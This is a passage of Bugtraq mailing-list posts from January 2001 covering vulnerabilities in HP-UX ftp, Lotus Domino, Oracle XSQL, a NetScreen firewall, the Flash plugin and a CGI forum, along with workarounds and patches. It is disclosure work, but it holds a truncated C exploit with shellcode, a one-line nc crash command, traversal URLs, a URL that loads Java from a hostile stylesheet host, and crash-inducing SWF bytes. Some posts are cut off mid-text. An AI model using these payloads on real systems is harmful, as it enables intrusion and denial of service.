> large web sites.  (Amazon, eBay, AltaVista, etc.)
> I have observed these sites returning banner ads written as jpeg,
> gif, and SWF.
> Let's say that one of the SWF files is corrupted.
> The single ad site can effectively deny all client access to the host
> site by crashing/hanging all client browsers.
>
> Server 'A' (the ad site) can directly prevent all clients from
> accessing server 'B' (the host web site).

Well, this is possible but again, as soon as you disable ads, you get in.
This remains an issue however, but should be named differently. How about
access blockage? Also, scripting "tricks" can be used similarly. Easy
verification in all cases: try a text browser. If you get in, it is access
blockage. (quickly coined abbreviation: AB)

> What's worse:  This is more difficult to identify since local testing
> on the local server may not identify why the clients are crashing.

Well, if local testing involves loading the page with one of the leading
browsers, then it almost surely will:-) Eg with an ad it has to target your
site specifically (and display with every new download) or else it may not
be noticeable.

> Question: How can sites protect themselves from this?
> (I mean: Aside from the obvious, "don't link to ad sites.")

It is equally tricky IMHO than it would be with a real DoS. Just as with a
DoS you can only act on a case-by-case basis and general rules are hard to
make, here it helps only if you react on a case-by-case basis. After all,
we are talking circumstances outside of your control here.

But you are right, considering that most people use one of the leading
browsers and have all sorts of interesting plugins and have no notion of to
handle them (eg how to disable them) this will become a problem just as
viruses have with the advent of all-singing-all-dancing,
totally-transparent-

Re: /usr/sbin/audlinks vulnerability

2001-01-09 Thread optyx


It was never stated you could use audlinks to gain root through
rsh/rlogin.

in my post I said you could use it to clobber (overwrite to clarify
because obviously I have to)

audlinks like many programs doesn't fstat the file it opens with O_RDWR
access properly.

As far as this posing a threat to a systems files, its highly
unlikely.  This was just notice of failure to fstat properly, which could
lead to problems.

And audlinks is executed on boot with static arguements, so this is not
vulnerable.

-Optyx
http://www.uberhax0r.net

Re: HP/UX FTP format string vulnerability

2001-01-09 Thread H D Moore

Zorgan,

Maybe I am missing the point, but how is making a non-setuid client
application crash a vulnerability?  Most Linux distro's before the summer of
2000 had the same problem, yet it never became a security issue.  I could
understand if the app was being called by a privileged application under
control of a non-privileged user[1], but this doesnt seem to be the case.

During the normal use of the ftp program, there is no reason for the user to
ever execute the SITE command containing the exact format string sequence
needed to exploit this.  Since the bug only affects the SITE command, even
people doing batch-mode transfers from untrusted sites shouldn't worry.  The
only exploit situation is if you allow an untrusted user to add commands to
your .netrc or otherwise have your user account execute arbitrary ftp
commands, either of which provides much easier access to your account than
exploiting a format string (get /some/dir/evilhosts /home/user/.rhosts).

This is almost as bad as saying that you can read /etc/shadow if you know
root's password, then calling it a vulnerability.  Anyways, attached is the
code...

-HD

1. I made a post a while back referring to overflows in the compress program,
but that program is installed on most anonymous FTP sites, allowing remote
users to gain shell access by uploading a file whose name contains the shell
code, then requesting the name of that file plus ".Z". Since then, SuSE has
fixed their version, not sure about anyone else. The compress program is part
of the "ncompress" package of most linux installations.

On Monday 08 January 2001 03:55 pm, [ zorgon ] wrote:
> HP/UX FTP format string vulnerability
>
> A format string vulnerability exists in ftp. This vulnerability was
> discussed with HP labs.
>
> $ uname -a
> HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
> $ ftp localhost
> Connected to localhost.
> 220 localhost FTP server (Version 1.1.214.6 Wed Feb  9 08:03:34 GMT 2000)
> ready. Name (localhost:zorgon):zorgon
> 331 Password required for zorgon.
> Password:
> 230 User zorgon logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> site exec %p %p %p %p
> 200-40008f10 0003 0002 0001
> 200  (end of '40008f10 0003 0002 0001')
> ftp> site exec %n %n %n %n
> Bus error(coredump)
> $
>
> And the 'SITE' command is also vulnerable
> 
> ftp> site %p %p %p %p
> 500 'SITE 40008F0C 0002 0002 0001': command not understood.
> ftp> site %n %n %n %n
> Bus error(coredump)
> $ file core
> core:   fichier de vidage de la memoire de'ftp' - recu SIGBUS
>
> The character format strings are not being parsed correctly in the ftp
> client. When HP labs fix the problem in the client, the result will be :
>
> ftp>  site exec %n %n %n %n
> --->  SITE exec %n %n %n %n
> 200-%n %n %n %n
> 200  (end of '%n %n %n %n')
> ftp>
>
> So in this case the ftpd server will not process the character format
> strings. The fix will be made in the next release of the ftp client.

#include 
#include 

/* compile this with: gcc -o hpftp hpftp.c */

char fshell[] = /* da shell code */
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e"
"\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a"
"\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78"
"\x79\x7a\x38\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x41"
"\x42\x42\x43\x43\x44\x44\x45\x45\x46\x46\x47\x47\x48\x48"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x0a\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

int main (int argc, char **argv)
{
	int i;
	int pof = 12;
	int hof = 2;
	int gof = 530;
	char poof[300];
	/* generate codes */
	i = sprintf(poof, "site exec %s%c%c%c%c|\r\n", fshell, 0xb6, 0x78, 0xff, 0xb3);
	i = ((i + pof) * hof);
	/* messy but works */
	poof[(i-gof)]=fshell[(i-gof)];
	poof[(i-gof)+fshell[55]+fshell[196]]=fshell[(i-(gof-0x0D))];
	poof[(i-gof)+fshell[168]/3]= fshell[(i-(gof-0x08))];
	poof[(i-gof)+fshell[184]]=fshell[(i-(gof-0x0E))];
	poof[(i-gof)+fshell[65]-fshell[60]]=fshell[(i-(gof-13))];
	poof[(i-gof)+fshell[114]-0x58]=fshell[(i-(gof-0x0b))];
	poof[(i-gof)+poof[(i-gof)+fshell[184]]]=fshell[(i-(gof-0x13))];
	poof[(i-gof)+fshell[189]]=fshell[(i-(gof-0x08))];
	poof[(i-gof)+(fshell[182]-fshell[175])]=fshell[(i-(gof-0x0D))];
	poof[(i-gof)+fshell[168]]=fshell[(i-(gof-0x04))];
	poof[(i-gof)+fshell[17]-fshell[83]]=fshell[(i-(

WORKAROUND: Lotus Domino 5.0.5 Web Server vulnerability

2001-01-09 Thread Leonardo Rodrigues


 Well, as Lotus haven't released a fix for the *confirmed* bug, we
get a workaround. Adding the following line:

map */../* /something.nsf

 at httpd.conf, seems to handle the bug. You should notice that
EVERYTHING using ../ links will stop working too, including the bug !

 We tested this on NT4 sp6a and Domino 5.0.5, and we COULDN'T get
the bug working after those lines were added.

 As we couldn't reproduce the bug on Linux Domino servers, and
seems that nobody could, we don't think adding those lines on Linux
httpd.conf servers is necessary.

 Sincerily,
 Leonardo Rodrigues
 Solution Web ( http://www.solutionweb.com.br )

Re: Hidden sniffer on unplumb'ed interface on Solaris

2001-01-09 Thread Casper Dik


>I don't actually consider this to be a problem. This is how some network
>IDSes are able to work (RealSecure for one) and can avoid all risk of IP
>based attacks (since there's no ipaddr on the if).
>
>But, the interfaces are able to found, you just need to look for the MAC
>address and not the IP. ;-) Checking the ARP tables of your switches and
>routers should bring a rogue interface that doesn't have an ipaddr assigned
>to it.
>

You won't find the MAC address anywhere; the interface is passive.  It
won't reply to ARP requests (no IP).  Since it doesn't send any other
packets, its MAC address can't be learned that way either.

Casper

Re: Lotus Domino 5.0.5 Web Server vulnerability - who cannot reproduce, and others

2001-01-09 Thread Dobos Sándor


- People who got error 404:
 If lotus is not on C: then You wont get the file (the path
../winnt/win.ini isnt valid)
- Who got error 500:
 You might be tried IE, but the url wont work under IE
- '.nsf' part of url is required!
- The bug also confirmed on 5.0.3, 5.0.2 under nt4sp4, sp5

- Anybody tried the new 5.0.6?

cly

bugtraq id 2173 Lotus Domino Server

2001-01-09 Thread Alan Bell


Further information on this issue:

1) This issue has been reproduced on several versions of domino prior to 5.0.5
2) My testing has failed to reproduce this issue on Linux and OS/400 (AS/400)
3) To secure your boxes create 3 file protection documents for each server granting no access to the following paths.

/.nsf/../
/.box/../
/.ns4/../

the other common domino extensions .ns3 and .ntf do not appear to be vulnerable. This is not a Lotus supported solution (as yet) so there may be additional similar paths with this behaviour. You should watch http://www.notes.net for an upgrade which will probably appear as 5.0.6a.

Alan.

Re: analysis of auditable port scanning techniques

2001-01-09 Thread Henrik Nordstrom


Dan Harkless wrote:

> Well, there's a feature request for auth/ident/tap daemons running on OSes
> (if any) that can distinguish after-the-fact between connections that
> originated locally and those that originated remotely.  Assuming that
> doesn't break RFCs 931 / 1413, of course (I'd re-read them right now to
> check, if I had the time)...

Well, the simple fix would to deny queries for ports where there is a
local service listening on the same interface/IP (or "ANY").

--
Henrik Nordstrom

Workaround: Lotus Domino Server Directory Traversal Vulnerability (2173)

2001-01-09 Thread Miha . Vitorovic


Hi all,

Today our Domino administrator (Robert Turnsek) and I spent some time trying to make the recent Domino vulnerability disappear. This is what we came up with.

Domino Server 5.0.5

- Open the Administration Client
- Select the server you want to administer
- "Configuration" tab / "Server" section / Current server document :
               Press the "Web" button
               Select "Create URL mapping/redirection"
- In the URL redirection document
  + "Basics" tab
         Select: URL ---> Redirection URL
  + "Mapping" tab
         Incoming URL: /.nsf/*
         Redirection URL: [the URL you want to redirect to, for example "http://www.notes.net"]
- Save the document
- Restart the HTTP task

I hope this helps...

---
  Miha Vitorovic
  In¾enir v tehniènem podroèju
  Customer Support Engineer

   NIL Data Communications,  Einspielerjeva 6,  1000 Ljubljana,  Slovenia
   Phone +386 1 4746 500      Fax +386 1 4746 501     http://www.NIL.si

New DDoS?

2001-01-09 Thread nealk


I think I have stumbled across a new category of distributed denial
of service (DDoS).  (If this is old news, I'm sure I'll be corrected;
it's new to me.)

Traditional DDoS have the follow flow:
  - A host (or few hosts) controls a large number of clients.
  - The clients are directed by the host to attack a single site/server.
The attack can either be network or service oriented.


Alternate (New) DDoS model:
  - Server 'A' directly prevents all clients from accessing server 'B'.


Here's an example of how it could work:
I recently posted about a Flash plugin risk that can crash or hang a browser.

Let's say that someone placed a corrupt Flash (SWF) file on a web server.
All clients that access the web server and that view the Flash file
(about 90% of all browsers can, so this is a good assumption) will
have their browsers crash or hang.

This is a DoS against the site, but it attacks the clients rather than
the server.

Now, let's take it one step further.
Doubleclick, adtegrity.spinbox.net, and Akamai are linked by most
large web sites.  (Amazon, eBay, AltaVista, etc.)
I have observed these sites returning banner ads written as jpeg,
gif, and SWF.
Let's say that one of the SWF files is corrupted.
The single ad site can effectively deny all client access to the host
site by crashing/hanging all client browsers.

Server 'A' (the ad site) can directly prevent all clients from
accessing server 'B' (the host web site).

What's worse:  This is more difficult to identify since local testing
on the local server may not identify why the clients are crashing.
The local server does not know what information was sent to the clients
by the ad sites.

In this example, I used ad sites and SWF files.  It can be done with
any third-party site (remember all the Web Bugs discussions?).
Although SWF can do it today, I'm sure there will be more technologies
that can do it tomorrow.


Question: How can sites protect themselves from this?
(I mean: Aside from the obvious, "don't link to ad sites.")


Finally, I'm sure there are some script kiddies just dying to be "the
first one to pull this off".  Please don't.  Accidents happen all by
themselves and it's only a matter of time before this is seen in the
wild and by accident.  Why bother implementing something this trivial?


Thoughts?

-Neal

Oracle XSQL servlet and xml-stylesheet allow executing java on the web server

2001-01-09 Thread Georgi Guninski


Georgi Guninski security advisory #34, 2001

Oracle XSQL servlet and xml-stylesheet allow executing java on the web server

Systems affected:
Oracle XSQL servlet, installed by default Oracle 8.1.7 Windows 2000installation,
probably other versions/platforms are affected because the servlet is written in java

Risk: High
Date: 9 January 2001

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or 
program or
any derivatives thereof.


Description:
To get an idea for the XSQL servlet I suggest reading:
http://technet.oracle.com/tech/xml/xsql_servlet/htdocs/relnotes.htm
The XSQL servlet allows specifying external xslt stylesheets which may reside anywhere.
The problem is it is possible to execute java on the web server in the xslt stylesheet.
Executing java on the web server may lead to compromising it.

Details:

Oracle allows extensions to the built in xslt functions using the xmlns
"http://www.oracle.com/XSL/Transform/java/".
Using this namespace it is possible to instantiate java objects and execute their 
methods.

Sample xslt stylesheets:
--ora.xsl---string function, almost no effect---

http://www.w3.org/1999/XSL/Transform" 
xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">



Written by http://www.guninski.com">Georgi Guninski


Java demo.








--ora2.xslcreates a file ---

http://www.w3.org/1999/XSL/Transform" 
xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.io.File" version="1.0">



Written by http://www.guninski.com">Georgi Guninski


File "c:\winnt\georgigjava" created=






---

Assuming that http://XSQL-SERVER/EXISTING.xsql exists and is configured (there are 
installed
.xsql demos in /xsql/java/demo/), the following URL:
--
http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl
--
will execute java from http://HOSTILE/ora.xsl (see example stylesheets above) on 
XSQL-SERVER.

This work on default Oracle 8.1.7 install, I only needed to adjust the database name in
the servlet config file.

Workaround:
Add 'allow-client-style="no"' on the document element of every xsql page.
I think this should be the default behavior.

Vendor status:
Oracle was contacted on 4 January 2001.
They responded very promptly and shall issue a patch "over the next few days".

Regards,
Georgi Guninski
http://www.guninski.com

Advisory #3 link error

2001-01-09 Thread [EMAIL PROTECTED]


We appear to have posted the incorrect link to our recent advisory on
a webboard advisory also known as cgisecurity advisory #3

The correct link for the vendor patches and updates is at the following
link posted below.

Sorry for the inconvience.

www.extropia.com/hacks/bbs_security.html

It is also noted that this vendor was very quick to fix the problem.

-zenomorph

Summary: Shockwave overflow

2001-01-09 Thread nealk


This message is a summary of the Flash plugin security risks and current
status.

Included are:
1. Macromedia's response to the security risk since the BugTraq posting on

   Dec. 29, 2000.
2. A detailed explanation of the read-overflow.
3. A detailed explanation of a CPU-resource-consumption defect.
4. My final(?) thoughts on this issue.


==
Macromedia's response

Prior to the BugTraq posting, I spent 6 months trying to contact them so
that
they could handle this issue in their own way.  Failing that, I posted to
BugTraq.  The response was startling.

Macromedia initially contacted me via email on Wed, 3 Jan 2001 (less than
24
hours later).
On Thursday evening we had a telephone conference to discuss the current
status and next steps.

The current status of the issues:
- They apologized for the mishandling of the security issue.  They
  said that there was a breakdown in the reporting process.
- They have validated the read-buffer-overflow.  This causes the browser
to
  crash, but does not permit arbitrary code to be executed.
- I spent the weekend attempting to duplicate what I thought was a
  write-buffer-overflow.  (Permits arbitrary code to be executed.)
  Currently this has not been verified.  We also discussed where they
could
  look in their source code to ensure that a write-buffer overflow is not
  available.
- We discussed providing a filter for the anti-virus companies.  This
  would identify corrupt SWF files and block them from crashing the
  browsers.  Macromedia said they would investigate this.
- We discussed their timeframe for code correction, testing, and
  distribution.  I'll let them announce the timeframe, but I found it
  very acceptable considering the nature of the issue.

On Friday, Jan. 5, they called me and presented both their public
statement and followup for BugTraq (www.securityfocus.com) for my review.
(I had some minor issues with the wording, but I think we have come to an
understanding.)  I'm not sure when they will be releasing these.


==
The read-overflow

The Flash file format (SWF) uses the form:

  tag length data tag length data 

Where "Tag" defines a task (define image, do action, etc.), "length" is
the
size of the data for the tag, and data contains tag-specific information.

Many of the tags expect the data to contain a null-terminator "0".  For
example, strings or complex actions (the "0" means "no more actions for
this
tag").

In most cases, if the terminating "0" is missing, a read-overflow is
created.

The net effect:
The Flash plugin crashes, and crashes the browser with it.  We suspect
that MS
Outlook may also crash if the Flash animation runs in the preview pane,
but
this is only in theory and has not been tested.

Impact:
If a corrupt SWF file is placed on a web server, it can cause a
buffer-overflow and crash all visiting browsers.  This is a DoS.


==
The CPU-resource-consumption defect

While trying to duplicate a write-overflow, I came across another SWF
risk.
The problem seems to be with tag 8 length 1 (action toggle quality, length

should be zero).

When tag 8 has a length of 1 (actual 1 byte of data is ignored), the
browser
hangs.

Under Win98 on a Dell Latitude Cp (laptop):
  - CPU pegs at 100%
  - Netscape is unresponsive
  - If I kill the unresponsive Netscape, my laptop hangs after a
suspend/restore and requires power cycling.  (Normally, Win98 on my
laptop is fairly stable.)

Under MacOS 9 on an iMac:
  - My CPU load program stops running (appears to hang)
  - Netscape hangs.  I cannot switch tasks (Command-. and other keyboard
strokes are ignored).  The system must be power cycled.
  - Only the mouse pointer moves, but it cannot click on anything.

I have not tested this on other platforms (but I'm fairly certain it is
there
too).

= Working example SWF code =
46 57 53 05 19 00 00 00 78 00 04 e2 00 00 0c e4 00 00 0a 03 00 01 02 00 00
=

Impact:
This is a worse DoS than the read-overflow because the browser does not
die
and all CPU cycles are consumed.  MacOS requires power-cycling and Win98
should be rebooted (ok, no surprise for Win98...).


==
Neal's final thoughts

I'd like to thank BugTraq.  I had my concerns about posting in a public
forum,
but I am amazed by the support I have received.  BugTraq works, I'm
impressed.

I have recieved a number of emails asked for my impressions and impact of
this
security risk.  I believe the worst-case scenario is a new category of
DDoS.
I'll follow this up in a different posting.

-Neal

Audiogalaxy.com mp3 sharing software

2001-01-09 Thread altomo


This was mentioned to Audiogalaxy several months ago, after a long
converstation via email it was noted that a problem did exist and something
*might* be done to fix it. Seems they have gone with our suggestion and fixed
it.


1. What is Audiogalaxy.com?
Audiogalaxy.com is a website devoted to mp3's that ofers a mp3 sharing
program. (I use this over napster)

2. Problem?
While this problem will not stop the world or allow the script kiddies
to ./wu their way through us, its a problem none the less.  Versions of
Audiogalaxy Satelite software pre .601W for windows held the username and
password for a users account in a plain text file within the audiogalaxy
directory on their system.  While if an intruder gained this information only
the list of songs in the download que (which is stored on the server) would
be compromised, this could have other effects.

2a.  theory one 1.  Gain the username and password for a users acct. Intruder
modies the download que so that when the user comes online they will download
a "mp3" from the intruders system.   The mp3 is actually something else. ie.
virus or back orifice or similar program.  If the user ran the mp3 directly
then of course the infection would start. --lets examine this a little
further. Evil intruder steals password and username. Edits download que.
User runs fake mp3 which is back orifice. User gets keylogged.  User is
goverment employee who telnets  (telnet bad) into secure goverment system.
Goverment system not secure anymore.  Web site gets defaced. Oh no the
kiddies can use this.

2b. theory two. 2.  Many users use a common password and this is the point
that i brought to Audiogalaxy.  While its not their problem if a user does
this, why not help out.  If the user had their Audiogalaxy username and
password compromised then its possible other things get compromised.


3. Solution

Upgrade to the newest version which has been out for sometime, and in general
use different passwords.

Note- I have not checked the Linux version for any problems, if someone gets
to it before I do pleae let me know.


NudeHackersDotCom
[EMAIL PROTECTED]

Nudie News:  sorry for the extreme down time, we are working hard to make a
strong come back.  As of today our servers are being moved so another minor
down time will occur.

NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability

2001-01-09 Thread Nsfocus Security Team


NSFOCUS Security Advisory(SA2001-01)

Topic:  NetScreen Firewall WebUI Buffer Overflow vulnerability

Release Date£º Jan 9th, 2001

CVE Candidate Numbers: CAN-2001-0007

Affected system:


ScreenOS release 1.73r1 on the NetScreen-1000
ScreenOS release 2.01r6 on the NetScreen-10/100
ScreenOS release 2.10r3 on the NetScreen-5
ScreenOS release 2.5r1  on the NetScreen-5/10/100

Non-affected system£º


ScreenOS release 1.73r2 on the NetScreen-1000
ScreenOS release 2.01r7 on the NetScreen-10/100
ScreenOS release 2.10r4 on the NetScreen-5
ScreenOS release 2.5r2  on the NetScreen-5/10/100

Impact:
=

NSFOCUS security team has found a buffer overflow vulnerability in
NetScreen Firewall WebUI. Exploitation of this vulnerability,
malicious user can launch remote DoS attack to crash the firewall.

Description£º


NetScreen Firewall is a popular commercial firewall. It has a Web
administration interface (default listening at port 80) that allows
firewall administrator to configure firewall with browser. However,
it is lack of length check-up of input URL. Provided with a oversized
URL request, a buffer overflow may take place that will crash the
NetScreen firewall. In that case, all connections through firewall
will be dropped, and the firewall won't response to any connection
request. Rebooting the firewall is required to regain its functions.

Attackers can launch attack without logining firewall.

All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3 and
2.5r1 are affected by this vulnerability on occasion that WebUI has
been enabled .


Exploit:
==

Once the input URL is longer than 1220 bytes£¬NetScreen firewall will
crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80

Following information will appear on firewall console£º

** EXCEPTION **

Bus error execption (data reference: load or store)

EPC   = 0x8009AA1C,   SR= 0x34501007,   Cause = 0x0080001C

Firewall halts now.


Workaround:
===

Disable WebUI management or appoint trusted administration host before
acquirement and installation of relevant patch.

Vendor Status:
==

We have notified NetScreen of this vulnerability on 12/19/2000 .
On 12/26/2000 NetScreen has issued following ScreenOS release versions
to fix the bug:

ScreenOS 1.73r2  on the NetScreen-1000
ScreenOS 2.10r4  on the NetScreen-5
ScreenOS 2.01r7  on the NetScreen-10/100
ScreenOS 2.5.0r2 on the NetScreen-5/10/100

Latest software are available at:
http://www.netscreen.com/support/updates.html
You can also contact NetScreen Technical Support Center
(mailto:[EMAIL PROTECTED]) for upgraded software.

Additional Information:


The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0007 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems.  Candidates
may change significantly before they become official CVE entries.

DISCLAIMS:
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

pidentd 3.0.12 port exclusion patch

2001-01-09 Thread optyx


Dear people running identd on machines they value the security of
(oxymoron, eh?):

This is an extension of the "Re: analysis of auditable port scanning
techniques" thread.

This is a patch for pidentd that gives it the options of not returning the
owner of the process bound to a port.

the following patch adds two options to pidentd.
-x commandline or port:exclude option can be used to specifically return
an "INVALID PORT" message
command line: identd -x21,22,23,79,80
config file : port:exclude = "21,22,23,79,80"

-X commandline or port:exclude_known option can be used to return an
"INVALID PORT" message to all "known" services that can be found in
/etc/services (getservbyport(3) call)
command line: identd -X
config file : port:exclude_known = on

http://www.uberhax0r.net/~optyx/pidentd.exclusion_patch.tar.gz (14kB)

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net - putting bullets in mullets since '97



 pidentd.exclusion_patch.tar.gz

Re: wuftpd 2.6.1 -- example of bad coding

2001-01-09 Thread Iván Arce


Hello,
 I fail to understand why these vulnerabilities are NOT
 exploitable, could you elaborate a bit on that?
-ivan

- Original Message -
From: "Przemyslaw Frasunek" <[EMAIL PROTECTED]>
Newsgroups: core.lists.bugtraq
To: <[EMAIL PROTECTED]>
Sent: Monday, January 08, 2001 4:12 PM
Subject: wuftpd 2.6.1 -- example of bad coding


> Hello,
>
> There are two non-exploitable format string bugs in wuftpd 2.6.1.
>
> ftpd.c:6272
>
> if (debug) {
> char *s = calloc(128 + strlen(remoteident), sizeof(char));
> if (s) {
> int i = ntohs(pasv_addr.sin_port);
> sprintf(s, "PASV port %i assigned to %s", i, remoteident);
> /* here */  syslog(LOG_DEBUG, s);
> free(s);
> }
> }
>
> ftpd.c:6288
>
> if (debug) {
> char *s = calloc(128 + strlen(remoteident), sizeof(char));
> if (s) {
> sprintf(s, "PASV port assignment assigned for %s",
remoteident);
> /* here */  syslog(LOG_DEBUG, s);
> free(s);
> }
> }
>
> Example:
>
> riget:venglin:~> tail -n1 /etc/hosts
> 212.182.115.2   riget%p%p%p%p%p%p%p%p%p%p.scene.pl riget
> riget:venglin:~> tail -n2 /var/log/debug
> Jan  8 14:28:03 riget ftpd[53990]: command: pasv^M
> Jan  8 14:28:03 riget ftpd[53990]: PASV port 17355 assigned to
riget0xbfbff1640x80536440x807c2000x8066c210x43cb0x80791000xe0x5c0x960x280850
00.scene.pl [212.182.115.2]

---

"Understanding. A cerebral secretion that enables one having it to know
 a house from a horse by the roof on the house,
 Its nature and laws have been exhaustively expounded by Locke,
 who rode a house, and Kant, who lived in a horse." - Ambrose Bierce


==[ CORE Seguridad de la Informacion S.A. ]=
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836  B25D 207B E78E 2AD1 F65A
email   : [EMAIL PROTECTED]
http://www.core-sdi.com
Florida 141 2do cuerpo Piso 7
C1005AAG Buenos Aires, Argentina.
Tel/Fax : +(54-11) 4331-5402
=





--- For a personal reply use [EMAIL PROTECTED]

Cgisecurity.com Advisory #3.1

2001-01-09 Thread [EMAIL PROTECTED]


The staff at cgisecurity.com have found a security issue with a
forum script that is widley used.

Below is the advisory along with the vendor patch.

-zenomorph

[Cgi Security Advisory #3.1]
  [EMAIL PROTECTED]
   bbs_forum.cgi



Found
January 3rd 2001

Vendor Contacted
January 3rd 2001

Public Release
January 7th 2001



Script Effected: bbs_forum.cgi
Free

Versions Effected:
1.0
(Others unknown)

Platforms
UNIX

Vendor
http://www.extropia.com
Patch
http://www.extropia.com/hacks/bbs_security0.html




1. Impact

Any file can be read with the permissions of user nobody(or webserver).
Possible root comprimise in bbs_forum.cgi script. Command execution is
allowed and therefore shell spawning is possible. This has been tested on
unix and linux systems only and it is unknown if windows versions exist
and/or are effected.

One thing to be noted about this hole is that perl was in taint mode, and
still allowed files to be read, and commands to be executed. This was
not originally intended. This is proof that perl -t is not always
enough.

Example:

www.host.com/cgi-bin/bbs_forum.cgi?forum=&read=../bbs_forum.cgi
Will grab the scripts own sourcecode.
Note: In order for this hole to work a valid forum name must be used,
so simply trying to call read= only may not work.

2. Fixes

The vendor has been contacted about this serious security problem.
Please visit the vendor's website for patches and other important
information.



3. Attached Vendor Patch

Note: This is a patch for people who know what they are doing.
Please visit http://www.extropia.com/hacks/bbs_security0.html
for information on upgrading.



* Vendor patch snippet **

If you have made extensive modifications to bbs_forum.cgi and do not wish
to start over from scratch, search for the line at the start of
bbs_forum.cgi that says

  &ReadParse;

  And insert afterwards the following:

  if ($in{'read'} && $in{'read'} !~ /^\d+-\d+\.msg$/i)
{
  print "Invalid Message #";
  die("Invalid Message # provided: " .
  $in{'read'});
  }
  if ($in{'reply_to_message'} &&
$in{'reply_to_message'} !~ /^\d+-\d+\.msg$/i) {
  print "Invalid Reply To Message #";
  die("Invalid Reply To Message # provided: " .
  $in{'reply_to_message'});
  }

This code assures the script that the message file
form variables can only consist of the strict filename format of digits
followed by a hyphen followed by some digits followed by the literal
string ".msg".

We recommend updating your script as soon as possible.
Special thanks to cgisecurity.com for pointing our the issue.


 End Patch **

Published to the Public January 2001
Copyright January 2001 Cgisecurity.com

security bulletins digest (fwd)

2001-01-09 Thread Ben Greenbaum

-- Forwarded message --
Date: Tue, 9 Jan 2001 03:53:04 -0800 (PST)
From: IT Resource Center <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: security bulletins digest

HP Support Information Digests

===
o  IT Resource Center World Wide Web Service
   ---

   If you subscribed through the IT Resource Center and would
   like to be REMOVED from this mailing list, access the
   IT Resource Center on the World Wide Web at:

 http://itrc.hp.com/

   Login using your IT Resource Center User ID and Password.
   Then select Support Information Digests (located under
   Maintenance and Support).  You may then unsubscribe from the
   appropriate digest.
===

Digest Name:  daily security bulletins digest
Created:  Tue Jan  9  3:00:02 PST 2001

Table of Contents:

Document ID  Title
---  ---
HPSBUX0101-136   Sec. Vulnerability in inetd(1M)

The documents are listed below.
---

Document ID:  HPSBUX0101-136
Date Loaded:  20010108
  Title:  Sec. Vulnerability in inetd(1M)

 HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00136, 09 Jan. '01

The information in the following Security Bulletin  should be acted upon
as soon as possible.  Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.

PROBLEM:  The inet server (inetd) on HP-UX can be hung by malicious
  users.

PLATFORM: HP 9000 servers running HP-UX releases 10.20, 10.24, 11.00,
  and 11.04.

DAMAGE:   Possible Denial of Service (DoS).

SOLUTION: Install the appropriate patch as noted below:
  PHNE_20747 for HP-UX release 10.20; or
  PHNE_21699 for VVOS release  10.24; or
  PHNE_21835 for HP-UX release 11.00; or
  PHNE_23068 for VVOS release 11.04.

AVAILABILITY:  The patches are available now.

I.
   A. Background
